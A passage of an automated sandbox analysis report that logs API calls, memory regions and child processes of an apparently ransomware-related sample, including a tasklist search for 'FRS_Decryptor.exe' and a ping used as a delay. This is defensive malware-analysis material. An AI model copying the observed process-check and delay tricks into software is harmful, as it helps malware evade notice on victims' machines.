CloseHandle (hObject=0x54) returned 1 [0091.082] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0091.082] GetEnvironmentStringsW () returned 0x141ad78* [0091.082] FreeEnvironmentStringsA (penv="=") returned 1 [0091.082] DeleteProcThreadAttributeList (in: lpAttributeList=0x108f408 | out: lpAttributeList=0x108f408) [0091.082] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0091.082] _close (_FileHandle=4) returned 0 [0091.083] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0091.546] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x108f750 | out: lpExitCode=0x108f750*=0x0) returned 1 [0091.546] CloseHandle (hObject=0x64) returned 1 [0091.546] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0091.548] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x108f750 | out: lpExitCode=0x108f750*=0x0) returned 1 [0091.548] CloseHandle (hObject=0x60) returned 1 [0091.548] _get_osfhandle (_FileHandle=1) returned 0x254 [0091.548] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0091.548] _get_osfhandle (_FileHandle=1) returned 0x254 [0091.548] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0091.548] _get_osfhandle (_FileHandle=0) returned 0x24 [0091.548] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0091.548] SetConsoleInputExeNameW () returned 0x1 [0091.548] GetConsoleOutputCP () returned 0x1b5 [0091.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0091.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.549] exit (_Code=0) Process: id = "79" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x69c6d000" os_pid = "0x81c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "78" os_parent_pid = "0x8e8" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4178 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 4179 start_va = 0xec0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 4180 start_va = 0xee0000 end_va = 0xee1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 4181 start_va = 0xef0000 end_va = 0xefefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 4182 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 4183 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 4184 start_va = 0xf80000 end_va = 0xf83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 4185 start_va = 0xf90000 end_va = 0xf90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 4186 start_va = 0xfa0000 end_va = 0xfa1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 4187 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4188 start_va = 0x7e800000 end_va = 0x7e822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e800000" filename = "" Region: id = 4189 start_va = 0x7e828000 end_va = 0x7e828fff entry_point = 0x0 region_type = private name = "private_0x000000007e828000" filename = "" Region: id = 4190 start_va = 0x7e82c000 end_va = 0x7e82cfff entry_point = 0x0 region_type = private name = "private_0x000000007e82c000" filename = "" Region: id = 4191 start_va = 0x7e82d000 end_va = 0x7e82ffff entry_point = 0x0 region_type = private name = "private_0x000000007e82d000" filename = "" Region: id = 4192 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4193 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4194 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4195 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4215 start_va = 0x1070000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 4216 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4217 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4218 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4223 start_va = 0xec0000 end_va = 0xecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 4224 start_va = 0xed0000 end_va = 0xed3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 4225 start_va = 0xee0000 end_va = 0xee2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 4226 start_va = 0xfb0000 end_va = 0x102dfff entry_point = 0xfb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4227 start_va = 0x1030000 end_va = 0x1030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 4228 start_va = 0x1040000 end_va = 0x1040fff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4229 start_va = 0x1050000 end_va = 0x1050fff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 4230 start_va = 0x1060000 end_va = 0x1063fff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 4231 start_va = 0x1080000 end_va = 0x1080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 4232 start_va = 0x1090000 end_va = 0x1090fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 4233 start_va = 0x10a0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 4234 start_va = 0x10e0000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 4235 start_va = 0x11b0000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 4236 start_va = 0x11e0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 4237 start_va = 0x12e0000 end_va = 0x1467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012e0000" filename = "" Region: id = 4238 start_va = 0x1470000 end_va = 0x15f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001470000" filename = "" Region: id = 4239 start_va = 0x1600000 end_va = 0x29fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001600000" filename = "" Region: id = 4240 start_va = 0x2a00000 end_va = 0x2b41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a00000" filename = "" Region: id = 4241 start_va = 0x2b50000 end_va = 0x2e24fff entry_point = 0x2b50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4242 start_va = 0x2e30000 end_va = 0x322bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e30000" filename = "" Region: id = 4243 start_va = 0x73420000 end_va = 0x73461fff entry_point = 0x73420000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4244 start_va = 0x73470000 end_va = 0x734d0fff entry_point = 0x73470000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4245 start_va = 0x734e0000 end_va = 0x734ebfff entry_point = 0x734e0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4246 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 4247 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4248 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4249 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4250 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 4251 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4252 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4253 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4254 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4255 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4256 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4257 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4258 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4259 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4260 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4261 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4262 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4263 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4264 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4265 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4266 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4267 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4268 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4269 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4270 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4271 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4272 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4273 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4274 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4275 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4276 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4277 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4278 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4279 start_va = 0x7e700000 end_va = 0x7e7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e700000" filename = "" Region: id = 4280 start_va = 0x7e825000 end_va = 0x7e827fff entry_point = 0x0 region_type = private name = "private_0x000000007e825000" filename = "" Thread: id = 236 os_tid = 0x444 Thread: id = 238 os_tid = 0xbbc Thread: id = 239 os_tid = 0xbac Thread: id = 240 os_tid = 0xbb0 Process: id = "80" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x97bc000" os_pid = "0x898" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "78" os_parent_pid = "0x8e8" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4197 start_va = 0x410000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 4198 start_va = 0x430000 end_va = 0x431fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 4199 start_va = 0x440000 end_va = 0x44efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 4200 start_va = 0x450000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 4201 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4202 start_va = 0x4d0000 end_va = 0x4d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4203 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 4204 start_va = 0x4f0000 end_va = 0x4f1fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 4205 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 4206 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4207 start_va = 0x7f430000 end_va = 0x7f452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f430000" filename = "" Region: id = 4208 start_va = 0x7f45a000 end_va = 0x7f45afff entry_point = 0x0 region_type = private name = "private_0x000000007f45a000" filename = "" Region: id = 4209 start_va = 0x7f45c000 end_va = 0x7f45efff entry_point = 0x0 region_type = private name = "private_0x000000007f45c000" filename = "" Region: id = 4210 start_va = 0x7f45f000 end_va = 0x7f45ffff entry_point = 0x0 region_type = private name = "private_0x000000007f45f000" filename = "" Region: id = 4211 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4212 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4213 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4214 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4219 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 4220 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4221 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4222 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 237 os_tid = 0x8e4 Process: id = "81" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x11a12000" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4281 start_va = 0x8f0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 4282 start_va = 0x910000 end_va = 0x911fff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 4283 start_va = 0x920000 end_va = 0x92efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 4284 start_va = 0x930000 end_va = 0x933fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4285 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 4286 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 4287 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 4288 start_va = 0x9d0000 end_va = 0x9d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 4289 start_va = 0x9e0000 end_va = 0x9e1fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 4290 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4291 start_va = 0x7e4d0000 end_va = 0x7e4f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e4d0000" filename = "" Region: id = 4292 start_va = 0x7e4f5000 end_va = 0x7e4f5fff entry_point = 0x0 region_type = private name = "private_0x000000007e4f5000" filename = "" Region: id = 4293 start_va = 0x7e4fb000 end_va = 0x7e4fdfff entry_point = 0x0 region_type = private name = "private_0x000000007e4fb000" filename = "" Region: id = 4294 start_va = 0x7e4fe000 end_va = 0x7e4fefff entry_point = 0x0 region_type = private name = "private_0x000000007e4fe000" filename = "" Region: id = 4295 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4296 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4297 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4298 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4299 start_va = 0xb10000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 4300 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4301 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4302 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4303 start_va = 0x8f0000 end_va = 0x8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 4304 start_va = 0x900000 end_va = 0x903fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 4305 start_va = 0xa10000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4306 start_va = 0xb20000 end_va = 0xb9dfff entry_point = 0xb20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4307 start_va = 0xd50000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 4308 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4309 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4310 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4311 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: 